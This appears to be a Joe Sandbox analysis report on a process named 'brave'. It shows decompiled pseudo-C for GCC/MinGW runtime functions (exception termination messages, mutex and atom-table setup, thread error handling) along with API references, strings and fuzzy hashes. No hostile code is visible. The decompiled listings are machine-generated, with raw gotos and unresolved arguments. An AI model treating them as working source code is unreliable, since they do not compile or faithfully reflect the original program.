			E00007FF67FF6A6023230(void* __edi, void* __eflags, void* __rbx, void* __rcx, void* __rdx, int __rdi, void* __rsi, void* __r12, char* __r13, int __r14, void* __r15) {
				void* _t43;
				void* _t75;
				void* _t93;
				void* _t94;
				intOrPtr _t100;
				long long* _t107;
				void* _t113;
				long long* _t114;
				long long* _t134;
				long long _t136;
				void* _t142;
				char* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				long long* _t170;

				_t93 = __edi;
				_t156 = _t155 - 0x90;
				_t154 = _t156 + 0x90;
				 *((long long*)(_t154 - 0x38)) = 0x7562206c;
				_t138 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x40)) = 0x74696d62;
				 *((long long*)(_t154 - 0x30)) = 0x74726f70;
				_t5 = _t138 + 0x78; // 0x756f6e6520746fe6
				 *((long long*)(_t154 - 0x28)) = 0x70747468;
				 *((long long*)(_t154 - 0x20)) = 0x2e636367;
				 *((long long*)(_t154 - 0x18)) = 0x2f67726f;
				_t113 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x70)) = 0x20746f6e;
				 *((long long*)(_t154 - 0x68)) = 0x73206867;
				 *((long long*)(_t154 - 0x60)) = 0x726f6620;
				 *((long long*)(_t154 - 0x58)) = 0x2074616d;
				 *((long long*)(_t154 - 0x50)) = 0x6f69736e;
				 *((long long*)(_t154 - 0x48)) = 0x7361656c;
				 *((long long*)(_t154 - 0x10)) = 0xa3a292f;
				 *((char*)(_t154 - 8)) = 0;
				E00007FF67FF6A600F680(_t43);
				_t157 = _t156 - (_t5 & 0xfffffff0);
				 *((long long*)(_t157 + 0x58)) = 0x7562206c;
				 *((long long*)(_t157 + 0x50)) = 0x74696d62;
				 *((long long*)(_t157 + 0x68)) = 0x70747468;
				 *((long long*)(_t157 + 0x60)) = 0x74726f70;
				 *((long long*)(_t157 + 0x78)) = 0x2f67726f;
				_t142 = __rcx;
				 *((long long*)(_t157 + 0x80)) = 0xa3a292f;
				 *(_t157 + 0x20) = 0x20746f6e;
				 *((long long*)(_t157 + 0x28)) = 0x73206867;
				 *((long long*)(_t157 + 0x30)) = 0x726f6620;
				 *((long long*)(_t157 + 0x38)) = 0x2074616d;
				 *((long long*)(_t157 + 0x40)) = 0x6f69736e;
				 *((long long*)(_t157 + 0x48)) = 0x7361656c;
				 *((long long*)(_t157 + 0x70)) = 0x2e636367;
				memcpy(__rbx, __rsi, __rdi);
				 *((char*)(_t157 + _t113 + 0x88)) = 0;
				E00007FF67FF6A60323A0();
				0;
				0;
				_t158 = _t157 - 0x30;
				if ( *0xa62b2d60 != 0) goto 0xa60234da;
				 *0xa62b2d60 = 1;
				E00007FF67FF6A6031BC0(0x2e636367);
				if (0x2e636367 == 0) goto 0xa60234b0;
				 *((intOrPtr*)(_t158 + 0x2c)) = 0xffffffff;
				r8d = 0;
				E00007FF67FF6A600E1F0(0x2e636367,  *0x2E756E672E63636F + 0x2e636367, _t142, _t113, _t158 + 0x2c);
				_t114 =  *0xa62b2c70; // 0x7ff6a6021d50
				 *_t114();
				r8d = 0x30;
				fwrite(_t113, _t157 + 0x20);
				if ( *((intOrPtr*)(_t158 + 0x2c)) == 0) goto 0xa60234a1;
				 *_t114();
				fputs(__r13);
				 *_t114();
				r8d = 2;
				fwrite(__r12, __r14);
				_t100 =  *((intOrPtr*)(_t158 + 0x2c));
				if (_t100 != 0) goto 0xa602349c;
				free(__r15);
				E00007FF67FF6A6032110(2, 1, 0x2e636367, _t114, _t113, 0x2e636367,  *0x2E756E672E63636F + 0x2e636367, 0x2e636367);
				 *_t114();
				fputs(_t153);
				goto 0xa602346b;
				 *0xa62b2c70();
				r8d = 0x2d;
				fwrite(??, ??, ??, ??);
				abort();
				 *0xa62b2c70();
				r8d = 0x1d;
				fwrite(??, ??, ??, ??);
				abort();
				if (_t100 != 0) goto 0xa602356f;
				0xa6031a10();
				_t107 =  *0x2e636367;
				 *((intOrPtr*)(_t107 + 0x10))();
				 *_t114();
				_t170 = _t107;
				r8d = 0xb;
				fwrite(??, ??, ??, ??);
				 *_t114();
				fputs(??, ??);
				 *_t114();
				fputc(??, ??);
				E00007FF67FF6A6031C20(_t107);
				goto 0xa60234d5;
				0xa6031a10();
				E00007FF67FF6A6031C20(_t107);
				_t178 = _t107;
				E00007FF67FF6A6031C20(_t107);
				_t134 = _t107;
				E00007FF67FF6A600FEC0();
				E00007FF67FF6A60319A0(_t93, _t94, _t107, _t134);
				 *_t107 = 0xa62b7100;
				_t75 = E00007FF67FF6A6032160(8, 1, 0xa62b7100, _t114, _t107, 0xa62b6af0, 0x7ff6a60231e0, _t170, _t178, 0x2e636367);
				_t136 =  *0xa62b2d30; // 0x17a76e70080
				if (_t136 == 0) goto 0xa60235e0;
				free(??);
				 *0xa62b2d30 = 0;
				return _t75;
			}

0x7ff6a6023230
0x7ff6a602323a
0x7ff6a6023241
0x7ff6a6023292
0x7ff6a60232aa
0x7ff6a60232ad
0x7ff6a60232bb
0x7ff6a60232bf
0x7ff6a60232cd
0x7ff6a60232df
0x7ff6a60232ed
0x7ff6a60232f1
0x7ff6a60232f4
0x7ff6a60232f8
0x7ff6a60232fc
0x7ff6a6023300
0x7ff6a6023304
0x7ff6a6023308
0x7ff6a602330c
0x7ff6a6023310
0x7ff6a6023314
0x7ff6a6023323
0x7ff6a6023333
0x7ff6a6023347
0x7ff6a6023356
0x7ff6a6023365
0x7ff6a6023374
0x7ff6a6023379
0x7ff6a602337c
0x7ff6a602338c
0x7ff6a6023391
0x7ff6a6023396
0x7ff6a602339b
0x7ff6a60233a0
0x7ff6a60233a5
0x7ff6a60233aa
0x7ff6a60233af
0x7ff6a60233b7
0x7ff6a60233bf
0x7ff6a60233ca
0x7ff6a60233ce
0x7ff6a60233d5
0x7ff6a60233e0
0x7ff6a60233e6
0x7ff6a60233ed
0x7ff6a60233f5
0x7ff6a602340b
0x7ff6a6023416
0x7ff6a6023421
0x7ff6a602342b
0x7ff6a6023435
0x7ff6a6023443
0x7ff6a602344c
0x7ff6a602345c
0x7ff6a602345e
0x7ff6a6023466
0x7ff6a6023470
0x7ff6a6023472
0x7ff6a6023487
0x7ff6a6023490
0x7ff6a6023492
0x7ff6a6023497
0x7ff6a602349c
0x7ff6a60234a1
0x7ff6a60234a9
0x7ff6a60234ae
0x7ff6a60234b5
0x7ff6a60234bb
0x7ff6a60234d0
0x7ff6a60234d5
0x7ff6a60234df
0x7ff6a60234e5
0x7ff6a60234fa
0x7ff6a60234ff
0x7ff6a602350b
0x7ff6a602350d
0x7ff6a6023515
0x7ff6a6023518
0x7ff6a6023523
0x7ff6a6023525
0x7ff6a6023528
0x7ff6a602353a
0x7ff6a6023544
0x7ff6a602354c
0x7ff6a6023556
0x7ff6a6023560
0x7ff6a6023565
0x7ff6a602356a
0x7ff6a602356f
0x7ff6a6023574
0x7ff6a602357e
0x7ff6a6023581
0x7ff6a6023586
0x7ff6a6023589
0x7ff6a6023599
0x7ff6a60235b6
0x7ff6a60235b9
0x7ff6a60235c4
0x7ff6a60235ce
0x7ff6a60235d0
0x7ff6a60235d5
0x7ff6a60235e4

APIs

memcpy.MSVCRT ref: 00007FF6A60233AF
fwrite.MSVCRT ref: 00007FF6A60234D0

Part of subcall function 00007FF6A600E1F0: strlen.MSVCRT ref: 00007FF6A600E27E
Part of subcall function 00007FF6A600E1F0: memcpy.MSVCRT ref: 00007FF6A600E292
Part of subcall function 00007FF6A600E1F0: free.MSVCRT ref: 00007FF6A600E29D

fwrite.MSVCRT ref: 00007FF6A602344C
fputs.MSVCRT ref: 00007FF6A6023466
fwrite.MSVCRT ref: 00007FF6A6023487
free.MSVCRT ref: 00007FF6A6023497
fputs.MSVCRT ref: 00007FF6A60234A9
abort.MSVCRT ref: 00007FF6A60234D5
fwrite.MSVCRT ref: 00007FF6A60234FA
abort.MSVCRT ref: 00007FF6A60234FF
fwrite.MSVCRT ref: 00007FF6A602353A
fputs.MSVCRT ref: 00007FF6A602354C
fputc.MSVCRT ref: 00007FF6A6023560

Strings

terminate called recursively, xrefs: 00007FF6A60234F0
https://, xrefs: 00007FF6A602333D
port at , xrefs: 00007FF6A602334C
not enou, xrefs: 00007FF6A6023253
/): , xrefs: 00007FF6A60232E3
gcc.gnu., xrefs: 00007FF6A602336A
lease su, xrefs: 00007FF6A6023285
gh space, xrefs: 00007FF6A602325D
port at , xrefs: 00007FF6A60232B1
for for, xrefs: 00007FF6A6023267
gcc.gnu., xrefs: 00007FF6A60232C3
bmit ful, xrefs: 00007FF6A6023329
nsion (P, xrefs: 00007FF6A602327B
l bug re, xrefs: 00007FF6A6023249
https://, xrefs: 00007FF6A60232A0
org/bugs, xrefs: 00007FF6A60232D5
org/bugs, xrefs: 00007FF6A602335B
bmit ful, xrefs: 00007FF6A6023296
terminate called after throwing an instance of ', xrefs: 00007FF6A602343C
l bug re, xrefs: 00007FF6A6023319
terminate called without an active exception, xrefs: 00007FF6A60234C6
mat expa, xrefs: 00007FF6A6023271
what(): , xrefs: 00007FF6A6023533

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: fwrite$fputs$abortfreememcpy$fputcstrlen
String ID: what(): $ for for$/): $bmit ful$bmit ful$gcc.gnu.$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$org/bugs$port at $port at $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 1586115568-1351603976
Opcode ID: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction ID: 4e451487fef61b1e1a8838730c969cb30c63ac40100ff9ff45136115bd2ae061
Opcode Fuzzy Hash: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction Fuzzy Hash: A5711121B0A74144EB209BB2A9443BD73A5FF54F84F544179EE9C8BB8ACE3EE060C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600F840 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 157synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6A600F848
CreateMutexA.KERNEL32 ref: 00007FF6A600F957
WaitForSingleObject.KERNEL32 ref: 00007FF6A600F968
FindAtomA.KERNEL32 ref: 00007FF6A600F97D
AddAtomA.KERNEL32 ref: 00007FF6A600F9BD
_onexit.MSVCRT ref: 00007FF6A600F9DA
ReleaseMutex.KERNEL32 ref: 00007FF6A600F9E2
CloseHandle.KERNEL32 ref: 00007FF6A600F9EB

Strings

aaaaaaaa, xrefs: 00007FF6A600F8F4
failed to add string to atom table, xrefs: 00007FF6A600FAA3
failed to to lock creation mutex, xrefs: 00007FF6A600FAB6
failed to get string from atom, xrefs: 00007FF6A600FAD6
__eh_shmem3_gcc_tdm_, xrefs: 00007FF6A600F897, 00007FF6A600F8C7
aaaaaaaa, xrefs: 00007FF6A600F8FE

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-4003979217
Opcode ID: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction ID: f8a78ca62ad2d598c9d05af5940872b9390e805a43ddce9e88a358f54994f626
Opcode Fuzzy Hash: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction Fuzzy Hash: 54618065E0BA4391EB10CF24EA0A2B52790FF45F85F858031C94EC76A9DE7EF995D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600FC40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF6A600FD13
abort.MSVCRT(?,?,?,?,?,?,00000000,00000001,?,?,00000060,?,00007FF6A60321C5), ref: 00007FF6A600FD19
RtlUnwindEx.KERNEL32 ref: 00007FF6A600FE2C

Strings

CCG!, xrefs: 00007FF6A600FD01
CCG", xrefs: 00007FF6A600FCA1
CCG!, xrefs: 00007FF6A600FC69
CCG , xrefs: 00007FF6A600FCAD

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction ID: f8b92663e1a057dedf0ba5f62737e34ce1bb2c28e740f1eab60a71992999caab
Opcode Fuzzy Hash: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction Fuzzy Hash: 62516C32609B8186D760CF65F9806AD73A5F789F98F644126EE8D83B58CF3AD4A1C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6012220 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 51
threadCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF6A6012220(void* __edi, void* __esp, void* __rbx, void* __rdi, void* __rsi, void* __rbp, void* __r12, void* __r13, void* __r14, void* __r15) {
				char _v14;
				short _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				char _v81;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				char _v120;
				void* _t206;
				signed int _t214;
				intOrPtr _t220;
				void* _t281;
				intOrPtr _t340;
				intOrPtr _t341;
				intOrPtr _t342;
				intOrPtr _t343;
				intOrPtr _t344;
				intOrPtr _t347;
				intOrPtr _t348;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t353;
				intOrPtr _t354;
				intOrPtr _t355;
				intOrPtr _t357;
				intOrPtr _t358;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr _t363;
				intOrPtr _t366;
				intOrPtr _t367;
				intOrPtr _t369;
				intOrPtr _t372;
				intOrPtr _t375;
				intOrPtr _t377;
				intOrPtr _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t386;
				intOrPtr _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				intOrPtr _t394;
				intOrPtr _t395;
				intOrPtr _t401;
				intOrPtr _t402;
				intOrPtr* _t405;
				void* _t406;
				void* _t412;
				intOrPtr* _t413;
				signed long long _t415;
				void* _t436;
				signed long long _t482;
				void* _t492;
				long long _t494;
				intOrPtr* _t496;
				intOrPtr* _t497;
				void* _t498;
				void* _t499;
				void* _t517;
				void* _t518;
				void* _t526;
				void* _t536;

				_t499 = _t498 - 0x98;
				_v120 = 0x6f727245;
				_v112 = 0x696e6165;
				_v104 = 0x70732070;
				_v96 = 0x20737965;
				_v88 = 0x65726874;
				_v80 = 0x20737965;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v16 = 0;
				_v14 = 0;
				GetCurrentThreadId();
				r8d = 0xa;
				__imp___ultoa();
				if (_v81 == 0) goto 0xa6012332;
				goto 0xa601230a;
				if (0x65726874 == 0x6b) goto 0xa6012327;
				if ( *((char*)( &_v120 + 0x65726874)) != 0) goto 0xa6012300;
				if (0 == 0x6a) goto 0xa6012327;
				 *((char*)(_t499 + 0x48)) = 0xa;
				 *((char*)(_t499 + 0x20646165726895)) = 0;
				OutputDebugStringA(??);
				abort();
				goto 0xa601231b;
				asm("o16 nop [cs:eax+eax]");
				_t405 =  &_v120;
				E00007FF67FF6A6010F00( &_v120);
				E00007FF67FF6A60104E0(0x2064616572687d);
				_t220 =  *_t405;
				if (_t220 != 0) goto 0xa60123a0;
				E00007FF67FF6A6012160();
				 *_t405 = 1;
				E00007FF67FF6A6010800(0x2064616572687d);
				_pop(_t406);
				_pop(_t492);
				_pop(_t517);
				_pop(_t526);
				goto E00007FF67FF6A6011110;
				if (_t220 == 1) goto 0xa6012382;
				 *0xa62b2c70();
				r9d = _t220;
				0xa60216f8();
				goto 0xa6012382;
				asm("o16 nop [eax+eax]");
				_t496 =  *0xa62b6920; // 0x7ff6a62c1400
				_t340 =  *_t496;
				if (_t340 == 0) goto 0xa6012518;
				if ( *((long long*)(_t340 + 0x60)) != 0) goto 0xa6012540;
				 *((long long*)(_t340 + 0x60)) = 0xa62b2bc8;
				E00007FF67FF6A60104E0(0xa62b2bc8);
				if ( *((intOrPtr*)(0x20646165726a4d)) != 0) goto 0xa60125f0;
				if ( *0x206461657268C5 == 0) goto 0xa6012430;
				free(_t406);
				if ( *0x206461657268CD == 0) goto 0xa601243e;
				free(_t492);
				if ( *0x206461657268D5 == 0) goto 0xa601244c;
				free(__rdi);
				 *((long long*)(0x20646165726875)) = 0;
				 *((long long*)(0x20646165726a4d)) = 0;
				memset(__edi, 0, 2 << 0);
				_t341 =  *_t496;
				if (_t341 == 0) goto 0xa6012758;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0xa6012550;
				 *((long long*)(_t341 + 0x58)) = 0xa62c13b0;
				if ( *0xa62c13b0 == 0) goto 0xa601255e;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0xa60125c0;
				 *((long long*)(_t341 + 0x58)) = 0xa62c13b0;
				 *((long long*)( *0xa62c13b0 + 0x1d0)) = 0x20646165726875;
				if ( *((long long*)(_t341 + 0x58)) == 0) goto 0xa60125e0;
				 *((long long*)( *((intOrPtr*)(_t341 + 0x58)))) = 0x20646165726875;
				if (_t341 == 0) goto 0xa60125a3;
				_t214 = 0 |  *((long long*)(_t341 + 0x60)) != 0x00000000;
				if (_t214 == 0) goto 0xa60125c9;
				if (_t341 == 0) goto 0xa6012a30;
				_pop(_t494);
				_t497 = _t517;
				_t518 = _t526;
				_pop(_t536);
				goto E00007FF67FF6A6010800;
				E00007FF67FF6A6017060();
				_t342 =  *_t497;
				if ( *((long long*)(_t341 + 0x60)) == 0) goto 0xa6012402;
				if (_t342 != 0) goto 0xa6012540;
				E00007FF67FF6A6017060();
				asm("o16 nop [cs:eax+eax]");
				goto 0xa601240d;
				if ( *((long long*)( *((intOrPtr*)(_t342 + 0x58)))) != 0) goto 0xa60124a7;
				if ( *((long long*)(_t342 + 0x58)) != 0) goto 0xa60126d8;
				 *((long long*)(_t342 + 0x58)) = 0xa62c13b0;
				 *0xa62c13b0 = _t494;
				if ((_t214 & 0xffffff00 |  *((long long*)(_t342 + 0x50)) != 0x00000000) == 0) goto 0xa601280d;
				if (_t342 == 0) goto 0xa6012c8c;
				 *((long long*)( *((intOrPtr*)(_t342 + 0x50)))) =  *0xa62c13b0;
				if (_t342 != 0) goto 0xa60124e2;
				E00007FF67FF6A6017060();
				_t343 =  *_t497;
				goto 0xa60124ea;
				goto 0xa60124bd;
				 *((long long*)(_t343 + 0x60)) = 0xa62b2bc8;
				goto 0xa60124ff;
				 *((long long*)(_t343 + 0x58)) = 0xa62c13b0;
				goto 0xa60124d6;
				_t344 =  *_t497;
				if (_t344 == 0) goto 0xa6012a40;
				if ( *((long long*)(_t344 + 0x70)) != 0) goto 0xa60126c8;
				 *((long long*)(_t344 + 0x70)) = 0xa62c13a0;
				if ( *0xa62c13a0 == 0) goto 0xa6012422;
				if ( *((long long*)( *_t497 + 0x70)) == 0) goto 0xa6012820;
				r12d = 0;
				goto 0xa601266a;
				asm("o16 nop [cs:eax+eax]");
				if (0xa62c13b0 == _t518) goto 0xa6012422;
				if (0x7ff6a62c13af - _t518 < 0) goto 0xa6012422;
				_t347 =  *_t497;
				if (_t347 == 0) goto 0xa6012708;
				if ( *((long long*)(_t347 + 0x68)) == 0) goto 0xa60126e8;
				_t348 =  *_t497;
				_t482 = _t518 + 0x7ff6a62c13af >> 1 << 4;
				if (_t536 ==  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + 0x68)))) + _t482 + 8))) goto 0xa6012830;
				if (_t348 == 0) goto 0xa6012730;
				if ( *((long long*)(_t348 + 0x68)) == 0) goto 0xa60126f8;
				_t350 =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x68))));
				if (_t536 -  *((intOrPtr*)(_t350 + _t482 + 8)) < 0) goto 0xa6012650;
				goto 0xa601265d;
				asm("o16 nop [eax+eax]");
				_t351 =  *((intOrPtr*)(_t350 + 0x70));
				goto 0xa6012616;
				goto 0xa6012574;
				 *((long long*)(_t351 + 0x68)) = 0xa62c13a8;
				goto 0xa6012689;
				 *((long long*)(_t351 + 0x68)) = 0xa62c13a8;
				goto 0xa60126b2;
				E00007FF67FF6A6017060();
				_t353 =  *_t497;
				if ( *0x7FF6A62C1410 == 0) goto 0xa60126e8;
				if (_t353 != 0) goto 0xa6012681;
				E00007FF67FF6A6017060();
				goto 0xa6012681;
				E00007FF67FF6A6017060();
				_t354 =  *_t497;
				if ( *((long long*)(_t353 + 0x68)) == 0) goto 0xa60126f8;
				if (_t354 != 0) goto 0xa60126ae;
				E00007FF67FF6A6017060();
				goto 0xa60126ae;
				E00007FF67FF6A6017060();
				_t355 =  *_t497;
				if ( *((long long*)(_t354 + 0x58)) == 0) goto 0xa6012492;
				if (_t355 != 0) goto 0xa6012550;
				E00007FF67FF6A6017060();
				if ( *((long long*)( *((intOrPtr*)(_t355 + 0x58)))) == 0) goto 0xa6012aac;
				_t357 =  *_t497;
				if (_t357 != 0) goto 0xa60124a7;
				E00007FF67FF6A6017060();
				_t358 =  *_t497;
				if ( *((long long*)(_t357 + 0x58)) == 0) goto 0xa60124b2;
				if (_t358 != 0) goto 0xa60125c0;
				E00007FF67FF6A6017060();
				_t359 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x58)))) + 0x1d0)) = _t494;
				if (_t359 != 0) goto 0xa60124c7;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t359 + 0x58)) == 0) goto 0xa60125e0;
				if ( *_t497 != 0) goto 0xa60124d2;
				E00007FF67FF6A6017060();
				_t361 =  *_t497;
				goto 0xa60124d6;
				 *((long long*)(_t361 + 0x50)) = 0xa62c13b8;
				goto 0xa6012594;
				 *((long long*)(_t361 + 0x70)) = 0xa62c13a0;
				goto 0xa6012633;
				if (_t361 == 0) goto 0xa6012c9e;
				if ( *((long long*)(_t361 + 0x68)) != 0) goto 0xa6012908;
				 *((long long*)(_t361 + 0x68)) = 0xa62c13a8;
				_t412 =  *((intOrPtr*)(_t351 + 0x58)) + 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0xa6012b20;
				_t281 =  *0xa62c13a0 - _t412; // 0x1
				 *((long long*)(_t361 + 0x70)) = 0xa62c13a0;
				if (_t281 > 0) goto 0xa6012ba2;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0xa6012a10;
				 *((long long*)(_t361 + 0x70)) = 0xa62c13a0;
				 *0xa62c13a0 =  *0xa62c13a0 - 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0xa6012b10;
				 *((long long*)(_t361 + 0x70)) = 0xa62c13a0;
				if ( *0xa62c13a0 != 0) goto 0xa6012422;
				if ( *((long long*)(_t361 + 0x68)) == 0) goto 0xa6012c5b;
				free(??);
				_t363 =  *_t497;
				if (_t363 == 0) goto 0xa6012cb7;
				if ( *((long long*)(_t363 + 0x78)) == 0) goto 0xa6012c4b;
				_t413 =  *((intOrPtr*)(_t363 + 0x78));
				 *_t413 = 0;
				if ( *((long long*)(_t363 + 0x70)) == 0) goto 0xa6012c38;
				 *((long long*)( *((intOrPtr*)(_t363 + 0x70)))) =  *_t413;
				goto 0xa6012422;
				if ( *_t497 != 0) goto 0xa601284f;
				E00007FF67FF6A6017060();
				_t366 =  *_t497;
				if (_t366 != 0) goto 0xa6012853;
				E00007FF67FF6A6017060();
				_t367 =  *_t497;
				if ( *((long long*)(_t366 + 0x70)) == 0) goto 0xa601285e;
				if (_t367 != 0) goto 0xa6012b20;
				E00007FF67FF6A6017060();
				_t369 =  *_t497;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x70)))) - _t413 + 1 <= 0) goto 0xa6012b80;
				if (_t369 != 0) goto 0xa6012b2d;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t369 + 0x70)) == 0) goto 0xa6012b34;
				if ( *_t497 != 0) goto 0xa6012ba2;
				E00007FF67FF6A6017060();
				_t372 =  *_t497;
				if (_t372 != 0) goto 0xa6012b49;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t372 + 0x68)) == 0) goto 0xa6012c28;
				if ( *_t497 != 0) goto 0xa6012b54;
				E00007FF67FF6A6017060();
				_t375 =  *_t497;
				if (_t375 != 0) goto 0xa6012c6e;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t375 + 0x68)) == 0) goto 0xa6012c79;
				if ( *_t497 != 0) goto 0xa6012b65;
				E00007FF67FF6A6017060();
				goto 0xa6012b65;
				_t377 =  *_t497;
				if (_t377 == 0) goto 0xa6012ba8;
				goto 0xa601288c;
				asm("o16 nop [cs:eax+eax]");
				E00007FF67FF6A6017060();
				goto 0xa60124fb;
				asm("o16 nop [eax+eax]");
				E00007FF67FF6A6017060();
				_t378 =  *_t497;
				if ( *((long long*)(_t377 + 0x70)) == 0) goto 0xa6012608;
				if (_t378 != 0) goto 0xa60126c8;
				E00007FF67FF6A6017060();
				if ( *((long long*)( *((intOrPtr*)(_t378 + 0x70)))) == 0) goto 0xa6012422;
				_t380 =  *_t497;
				if (_t380 != 0) goto 0xa6012624;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t380 + 0x70)) == 0) goto 0xa6012820;
				if ( *_t497 != 0) goto 0xa601262f;
				E00007FF67FF6A6017060();
				goto 0xa6012633;
				_t383 =  *_t497;
				if (_t383 != 0) goto 0xa601255e;
				E00007FF67FF6A6017060();
				_t384 =  *_t497;
